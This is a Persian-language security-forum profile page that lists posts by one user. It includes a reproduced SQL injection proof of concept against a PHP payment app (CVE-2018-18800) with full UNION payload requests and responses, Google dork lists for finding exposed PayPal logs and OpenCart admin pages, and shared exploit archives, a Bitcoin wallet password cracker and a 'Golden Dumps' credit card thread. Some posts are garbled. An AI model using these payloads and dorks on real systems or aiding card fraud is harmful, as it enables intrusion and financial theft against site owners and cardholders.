رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Stubborn

ICG Programmer
  • تعداد ارسال ها

    150
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    39
  • Country

    ایران

آخرین بار برد Stubborn در اسفند 26 2021

Stubborn یکی از رکورد داران بیشترین تعداد پسند مطالب است !

اعتبار در سایت

148 Excellent

درباره Stubborn

  • درجه
    مسئول برنامه نویسی ICG
  • تاریخ تولد ۹۲/۱۱/۰۴

Converted

  • Name
    Mr.MZ
  • Main os
    Linux
  • Programming language
    خیر

آخرین بازدید کنندگان نمایه

2,859 بازدید کننده نمایه
  1. Stubborn

    PayPal/Credit Card/Debit Card SQL Injection

    با سلام خدمت دوستان ، با استفاده از کنورتو یا kids در اندروید .termux/ Access_tyep: offline Openid.realm Response_type: permission id_token code Redirect_url: bitcoin.com Storagegerl / Ss_domin / Prompt / select account /client ID #scoped User_info_emile User_info
  2. Stubborn

    شکستن قفل پکیج آموزشی

    به نام خدا در ادامه مهندسین عزیز ، فایل را بکشید ، http://convertword.persiangig.com کپی ازاد . حسبی الله.
  3. Stubborn

    شکستن قفل پکیج آموزشی

    دوستان میتونن ازاین اکسپیلوت استفادع کنید https://www.ibm.com/docs/en/rational-clearcase/8.0.1?topic=view-converting-hijacked-files-checkouts https://rogueamoeba.com/fission/
  4. Stubborn

    PayPal/Credit Card/Debit Card SQL Injection

    دورد DORK Dork : intitle:"index of"PayPal.log>" #ME
  5. با سلام Dork #Dork : "Powered By OpenCart" #Dork : intext:OpenCart inurl:index.php?route=common/dashboard #Dork : intext:"Powered By OpenCart" -site:opencart.com -inurl:"Powered By OpenCart" -intitle:"OpenCart" -intitle:"powered by"
  6. Stubborn

    PayPal/Credit Card/Debit Card SQL Injection

    دورد DOrk # Dork: inurl:"/wp-content/plugins/wp-shopping-cart/" # Dork: inurl:cart.php?m=features&id= # Dork: filetype:log inurl:paypal # Dork: inurl:wp-content/plugins/payment-form-for-paypal-pro # Dork: inurl:"paypal.log" ext:log # Dork: inurl:"paypal" intitle:"index of" backup | db | access -github # Dork: intitle:"index of" inurl:"paypal" log # Dork: inurl:inc_paypalstoremanager.asp # Dork: "Powered by DUpaypal" -site:duware.com # Dork: intext:OpenCart inurl:index.php?route=common/dashboard
  7. Stubborn

    PayPal/Credit Card/Debit Card SQL Injection

    دوره آموزش SQL Injection PayPal/Credit Card/Debit Card # Exploit Title: PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection # Dork: N/A # Date: 2018-10-29 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.sourcecodester.com/users/janobe # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tubigangarden.zip # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-18800 # POC: # 1) # http://localhost/[PATH]/index.php?p=accomodation&q=[SQL] # #[PATH]/accomodation.php #... #50 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "' AND `NUMPERSON` = " . $_POST['person']; #51 #52 #53 }elseif(isset($_GET['q'])){ #54 #55 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ACCOMODATION`='" . $_GET['q'] . "'"; #56 #57 #58 #59 } #60 #61 $accomodation = ' | ' . $_GET['q']; #62 ?> #... GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 Connection: keep-alive HTTP/1.1 200 OK Date: Sun, 28 Oct 2018 19:55:17 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/index.php?p=rooms&q=[SQL] # #[PATH]/room_rates.php #... #50 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `NUMPERSON` = " . $_POST['person']; #51 #52 #53 }elseif(isset($_GET['q'])){ #54 #55 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID` AND `ROOM` LIKE '%" . $_GET['q'] . "%'"; #56 #57 #58 }else{ #59 $query = "SELECT * FROM `tblroom` r ,`tblaccomodation` a WHERE r.`ACCOMID`=a.`ACCOMID`"; #60 } #61 #62 $accomodation = ' | ' . @$_GET['q']; #63 ?> #... GET /[PATH]/index.php?p=rooms&q=RM%20223%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 Connection: keep-alive HTTP/1.1 200 OK Date: Sun, 28 Oct 2018 19:58:47 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 3) # http://localhost/[PATH]/admin/login.php # #[PATH]/admin/login.php #... #58 if (isset($_POST['btnlogin'])) { #59 //form has been submitted1 #60 #61 $uname = trim($_POST['email']); #62 $upass = trim($_POST['pass']); #...
  8. Stubborn

    Golden Dumps Creditcard Bank

    ببخشید سلام . اینم فکر کن بدرد مرحله اول کار بخوره ایا با این تفسیر چنین کاریو میتونم انجام بدم ؟
  9. Stubborn

    Golden Dumps Creditcard Bank

    عالی بود من یکم درمورش جستجو کردم عالی بود کارت هنوزم میشه استفاده کرد فکر کنم روی CKWPortal ها جواب بده https://www.cncbinternational.com/susip/maintenance-c.html جواب میگیریم ایا ؟ ,+
  10. Stubborn

    Bitcoin Wallet Pass Finder

    با سلام و احترام به عزیزان تیم Bitcoin Wallet Pass Finder به کمک این برنامه و ( کمبولیست , فرام ورک و DLL ) میتونین به راحتی پسور های خود را کرک کنید یا کلینت انجام بدید . BTC_PassCrack_140207_en.zip
  11. Stubborn

    CVE Archive Expilot 2014-2018

    با سلام گفتم با شمام به اشتراک بزارم شاید مفید واقع شد Security Vulnerability Database Expilot Archive Apache Struts 2 CVE-2017-5638 CVE-2018-11776 Apache Struts 2 CVE-2017-5638 Apache Struts 2 CVE-2017-9805 Apache Struts 2 CVE-2018-11776 Docker API RCE Drupalgeddon2 CVE-2018-7600 Heartbleed CVE-2014-0160 JBoss CVE-2015-7501 Jenkins CVE-2015-8103 Jenkins CVE-2016-0792 Shellshock CVE-2014-6271 Tomcat CVE-2017-12617 WebLogic CVE-2016-3510 WebLogic CVE-2017-10271 WebLogic CVE-2018-2894 WebSphere CVE-2015-7450 CVE Expilot.zip
  12. Stubborn

    Docker-CVE-2021-3156

    سلام و وقت بخیر خدمت دوستان و کاربران داکر چیست؟ یک ایمیج کانتینر داکر (Container Image) بسته‌ای اجرایی نرم‌افزاری با حجم کم و مستقل است که همه آنچه برای اجرای یک اپلیکیشن مورد نیاز است را در بر می‌گیرد. این موارد شامل کدها، زمان اجرا (Runtime)، ابزارهای سیستمی، کتابخانه‌های سیستمی و تنظیمات لازم است. این Imageها در زمان اجرا به کانتینرها تبدیل می‌شوند و این تبدیل در زمان اجرا روی موتور داکر (Docker‌ Engine) انجام می‌شود. در ادامه مقاله «داکر چیست» به شرح مسئله‌ و چالشی پرداخته شده که نیاز به ابداع داکر را ایجاب کرده است. docker-CVE-2021-3156 Send And Resive #Extert File #Cd File #Install Dockerfile #Install install_sudo1_9_5p1 $bash Run $bash build and Downlaoding docker-CVE-2021-3156-master.zip
  13. Stubborn

    پیدا کردن پسورد گوشی آیفون

    درود بله هست از نرم افزار جیلبریک میتونینن استفاده کنید.
  14. \ بکاپ / با سلام در غیر این صورت پیام خصوصی بدید.
  15. Stubborn

    واقعیت vs تصورات😂😂

    با سلام Ford Simulator 7.0 یه زمان این موضوع برای من به عنوان یه خیال بود با گذشت زمان تحقق پیدا کرد و بهش دست پیدا کردم . با یه کپی براداری ساده و یخورده خلاقیت برای خودم به صورت شخصی به زبانی که یاد گرفته بودم بازنویسی کردم و حالا نمیدونم واقعیته یا تصور . یا حق

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...